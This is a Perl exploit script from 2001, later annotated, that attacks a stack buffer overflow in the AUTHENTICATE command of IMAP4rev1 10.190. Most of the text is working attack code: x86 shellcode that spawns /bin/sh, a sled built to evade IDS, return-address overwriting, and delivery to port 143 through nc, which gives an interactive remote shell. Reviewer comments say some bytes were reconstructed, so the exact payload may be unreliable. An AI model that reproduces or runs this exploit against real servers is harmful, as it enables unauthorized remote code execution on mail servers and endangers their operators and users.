# Title : IMAP4rev1 10.190 Authentication Stack Overflow Exploit
# Published : 2001-01-19
# Author : teleh0r
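#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.
##
## Proof of concept for a stack-based buffer overflow in the AUTHENTICATE
## command handling of IMAP4rev1 10.190.  One IMAP literal of $len bytes
## is sent: a sled of 'A' bytes, the shellcode, then the candidate return
## address repeated to the end of the literal so that the saved return
## pointer lands on one of the copies.  The address assumes a 32-bit x86
## Linux stack layout and normally needs per-target tuning via <offset>.
##
## NOTE(review): the copy this was restored from had lost every backslash
## (the "\xNN" escapes of the shellcode, the "\n" in the usage line, the
## CR/LF framing of the literal and the quoting around the nc command);
## they were reconstructed from context -- compare against an original
## before relying on the exact bytes.
use strict;
use warnings;
use IO::Handle;    # autoflush() on the pipe to nc

# Linux/x86 payload as published: jumps to the string tail, adds 0x30 to
# the obfuscated bytes so they read "/bin/sh", NUL-terminates it, calls
# execve via int 0x80 (al = 0x0b) and then exit.  Sent verbatim.
my $shellcode = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80" .
                "\x46\x03\x30\x80\x46\x05\x30\x80\x46\x06\x30\x89" .
                "\xf0\x89\x46\x08\x31\xc0\x88\x46\x07\x89\x46\x0c" .
                "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" .
                "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff" .
                "\x2f\x32\x39\x3e\x2f\x43\x38";

my $len = 1052;          # Sufficient to overwrite the return value.
my $nop = 'A';           # Using A/0x41 (inc ecx) as nops to try to fool IDS.
my $ret = 0xbffff30f;    # Return Value / ESP / Stack Pointer.

if (@ARGV < 2) {
    print "Usage: $0 <target> <offset>\n";
    exit(1);
}
my ($target, $offset) = @ARGV;

# Both arguments are attacker-side input but still reach nc and the
# address arithmetic unchanged, so accept only what they can legitimately
# be: a hostname/IPv4 literal that cannot be mistaken for an nc option,
# and a signed decimal offset.
$target =~ /\A[A-Za-z0-9][A-Za-z0-9.\-]*\z/
    or die "bad target '$target': expected a hostname or IPv4 address\n";
$offset =~ /\A-?\d+\z/
    or die "bad offset '$offset': expected a signed integer\n";

# Build the overflow string.
#   $len       - total payload length in bytes (the size announced in the literal)
#   $shellcode - raw bytes placed right after the sled
#   $nop       - single sled byte
#   $addr      - 32-bit return address; packed with 'V' (explicit little-endian,
#                as x86 expects) instead of native-order 'l' so the bytes are
#                right even when this script runs on a big-endian host
# The sled is shortened by 100 bytes so that 25 copies of the address fill the
# remainder; the stride-of-4 fill loop up to $len is the original's.
sub build_payload {
    my ($len, $shellcode, $nop, $addr) = @_;
    my $sled_len = $len - length($shellcode) - 100;
    my $buffer   = ($nop x $sled_len) . $shellcode;
    my $new_ret  = pack('V', $addr);
    for (my $i = length($buffer); $i < $len; $i += 4) {
        $buffer .= $new_ret;
    }
    return $buffer;
}

# IMAP literal framing: "{size}" CRLF, then exactly $len bytes, then a line end.
my $exploit_string = "* AUTHENTICATE {$len}\r\n"
    . build_payload($len, $shellcode, $nop, $ret + $offset)
    . "\n";

# List-form pipe open replaces "(echo -e ... ; cat) | nc": no shell is
# involved, so $target cannot inject commands and the raw payload bytes are
# not reinterpreted by echo -e.  nc inherits our stdout, and forwarding
# STDIN afterwards preserves the interactive session that "cat" provided.
open my $nc, '|-', 'nc', $target, '143'
    or die "cannot run nc: $!\n";
binmode $nc;
$nc->autoflush(1);
print {$nc} $exploit_string or die "write to nc failed: $!\n";
while (defined(my $line = <STDIN>)) {
    print {$nc} $line or die "write to nc failed: $!\n";
}
close $nc or warn "nc exited with status $?\n";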